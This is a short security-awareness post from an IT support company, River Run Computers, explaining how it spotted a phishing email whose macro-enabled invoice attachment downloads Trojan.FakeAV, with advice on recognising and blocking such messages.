Trojan.FakeAV has been around for quite a while, however its making another debut. This type of malware tries to convince a user to remove non-existent malware or security risks from their computers by installing bogus software.
Users are offered a link to software from spam emails, blogs/forums that are spammed, malicious banner ads, pirated software, file sharing networks, or even exploited web pages.
Once installed, a constant stream of pop-up warnings appear stating a harmful virus has been detected alerting you to purchase software to clean this up.
Here is what we received via email:
Noted the following:
- From email address is from outside the US (.it=Italy)
- The “?” in the beginning of the body
- No mention of company name or logo
- No mention of what was “purchased”
- There have not been any purchases in the amount noted ($6,901) recently
- The attached .doc file with the supposed invoice. This is not how any vendor in the past sends this information.
Also noticed the error in the header stating the following:
“If there are problems with how this message is displayed, click here to view in a web browser.”
This indicates that there is poorly coded HTML in the body of the message. Viewing the source of the message verified this. Any creditable online vendor would not be sending code riddled with errors.
The attached doc file was opened on a secured workstation to see the contents. A snip of the document is below:
The document contains direction to allow an embedded macro to run. You should NEVER allow macros to run on any Office document that you do not completely understand the source and purpose of.
I extracted the macros out of the file to determine what they did and the infection. I found that it was designed to download a file called rkn.exe from a web host in Australia. That file, if executed, will infect the machine with the Trojan.FakeAV!gen29 malware. This infection is from a family of “fake AV” malware that purports to be virus protection software. It can cause pop ups that make it appear that a virus has been found on a workstation, and that software to remove the infection can be run to remove it. This “removal” comes at a price, and does not remove the actual malware.
What can you do if you receive a message that appears like the example?
If you receive a message that appears like the example, do not open the attachment. Let your IT support people know you received the message, and delete it immediately and clear it from your recycle bin if requested.
How can you prevent a message like this from getting to your email?
Unfortunately, anti-virus programs may not be able to block this type of email. The example email was delivered through a spam/virus mail filter, and not captured by desktop antivirus. The best method of blocking this type of infection through email is to use a gateway anti-virus and spyware solution. The SonicWALL family of firewalls can be configured to clock all Office attachments with macros from entering the local network.
Contact River Run Computers immediately if you become aware of a virus on your computers. We will do our best to resolve the issues as quickly as possible. Click on this link for our Support Desk or call us directly at 414-228-5617.